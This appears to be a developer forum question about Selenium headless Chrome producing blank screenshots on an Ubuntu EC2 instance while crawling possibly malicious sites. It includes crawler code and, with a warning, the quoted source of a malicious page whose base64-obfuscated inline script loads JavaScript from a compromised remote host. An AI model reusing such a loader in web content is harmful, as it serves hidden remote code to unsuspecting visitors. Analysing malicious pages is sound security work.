I am using the Python bindings for Selenium to load websites (they may be malicious, benign, or greyware) for a project I'm building.
While the majority of pages behave identically (whether they're SPAs or traditional HTML pages), I've noticed that there is at least a subset that -- on an Amazon EC2 t2.micro instance of Ubuntu Jammy (ubuntu-jammy-22.04-amd64-server-20220609, with Chrome v112.0.5615.121 and Chromedriver v112.0.5615.49) -- produce blank screenshots when I use the `get_screenshot_as_base64()` call with a Chrome driver:
Blank screenshot on Ubuntu EC2 instance
Testing locally on a Mac M1 (running OS X Monterey with Chrome v112.0.5615.137 and Chromedriver v112.0.5615.49) with the exact same code (provided below), however, does not produce a blank screenshot:
Non-blank screenshot on Mac M1
Code:
```python
def crawl_test(url, sshot_outfile="test.png"):
    import base64
    import time
    from web_driver_wrapper import WebDriverWrapper

    screenshot = None
    try:
        with WebDriverWrapper() as driver_wrapper:
            driver = driver_wrapper.driver
            driver.get(url)
            tries = 10  # at 0.5 s per retry, this is roughly 5 seconds of waiting
            screenshot = driver.get_screenshot_as_base64()
            while (screenshot
                   and screenshot.endswith(config.SCREENSHOT_BYTES_BLANK)
                   and tries > 0):
                logger.info(f"Trying to get non-empty screenshot, attempt #{10 - tries}")
                time.sleep(0.5)
                screenshot = driver.get_screenshot_as_base64()  # try capturing again
                tries -= 1
        with open(sshot_outfile, 'wb') as f:
            f.write(base64.b64decode(screenshot))
    except Exception:
        logger.exception(f"Failed to capture a screenshot for {url}")
```

(`config.SCREENSHOT_BYTES_BLANK` and `logger` are defined at module level elsewhere in my project.)
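The retry logic above boils down to a small generic helper, which may make the loop easier to reason about. This is just a sketch; `capture_until` is an illustrative name, not something in my codebase:

```python
import time

def capture_until(capture, is_blank, tries=10, delay=0.5):
    """Call `capture` until it returns a non-blank result or tries run out.

    capture  -- zero-argument callable returning a screenshot string
    is_blank -- predicate deciding whether a capture should be retried
    """
    shot = capture()
    while shot and is_blank(shot) and tries > 0:
        time.sleep(delay)
        shot = capture()  # try capturing again
        tries -= 1
    return shot

# With a real driver this would be invoked roughly as:
#   capture_until(driver.get_screenshot_as_base64,
#                 lambda s: s.endswith(config.SCREENSHOT_BYTES_BLANK))
```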
The WebDriverWrapper() call mentioned above essentially looks like the following:
```python
chrome_options.add_argument("--headless")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--disable-gpu")
chrome_options.add_argument("--disable-dev-tools")
chrome_options.add_argument("--no-zygote")
chrome_options.add_argument("--single-process")
chrome_options.add_argument("--window-size=1080,768")
chrome_options.add_argument("--remote-debugging-port=9222")
input_driver = webdriver.Chrome(chromedriver_location, options=chrome_options)
return input_driver
```

(Note: I originally had `window-size=1080x768`; Chrome expects the flag as `--window-size=1080,768`, with leading dashes and a comma separator.)
The `chromedriver_location` variable is passed in based on whichever OS I'm using and works fine.
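For completeness, the flag list can be factored into a tiny helper so both platforms build identical options. This is only a sketch (the function name `build_chrome_flags` is hypothetical), using the comma-separated `--window-size=width,height` form Chrome expects:

```python
def build_chrome_flags(width=1080, height=768, debug_port=9222):
    """Return the Chrome command-line flags used for headless crawling."""
    return [
        "--headless",
        "--no-sandbox",
        "--disable-dev-shm-usage",
        "--disable-gpu",
        "--disable-dev-tools",
        "--no-zygote",
        "--single-process",
        f"--window-size={width},{height}",  # comma-separated, leading dashes
        f"--remote-debugging-port={debug_port}",
    ]

# Usage with a real ChromeOptions instance would look like:
#   for flag in build_chrome_flags():
#       chrome_options.add_argument(flag)
```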
While I haven't evaluated all of the cases, I know that at least one of the scenarios where this difference occurs is that the Ubuntu version does not seem to evaluate the script in the `<head>` tag, whereas the Mac version does. The page source is as follows (note that the HTML below is from a malicious website, so please do not run it unless you know what you're doing!):
<html><head><script src="https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/admin/js/fr.js"></script></head><body><input id="b64u" type="hidden" value="aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC8zNDhmMjE5LnBocA=="/><script>const per = document.createElement("script");per.src=atob("aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUvaG9zdCU1YnYxNyU1ZC9hZG1pbi9qcy9mci5qcw==");document.head.appendChild(per);</script></body></html>
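For reference, the two base64 payloads in that page decode straightforwardly; the snippet below just mirrors the page's `atob` calls in Python (do not fetch these URLs):

```python
import base64

# value of the hidden <input id="b64u"> element
hidden_value = ("aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUv"
                "aG9zdCU1YnYxNyU1ZC8zNDhmMjE5LnBocA==")
# argument to atob() in the inline <script>
script_src = ("aHR0cHM6Ly9mbXBsYXkuY29tLmJyL2ZtL3dwLWNvbnRlbnQvY2FjaGUv"
              "aG9zdCU1YnYxNyU1ZC9hZG1pbi9qcy9mci5qcw==")

print(base64.b64decode(hidden_value).decode())
# https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/348f219.php
print(base64.b64decode(script_src).decode())
# https://fmplay.com.br/fm/wp-content/cache/host%5bv17%5d/admin/js/fr.js
```

So the inline script just re-loads the same `fr.js` already referenced in the `<head>`.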
On the MacBook, it takes about two loop iterations to evaluate the script and send me to the final page. On the EC2 instance, however, it simply never changes; I've tried looping for up to ~50 seconds there with no change, just in case it was a resource issue.
In addition, I have tried the following, each of which elicited no change to the behavior on the Ubuntu instance:
- a few different versions of Chrome/Chromedriver
- the `Service`-based setup referenced here
- using `xvfb-run` as described here
- using the `Remote` class of Selenium's webdriver as described at the end of this article
At this point, I've exhausted all of my expertise and Googling, and I'm hoping some fantastic person out there has run into and overcome this issue. Thanks in advance for any of your time!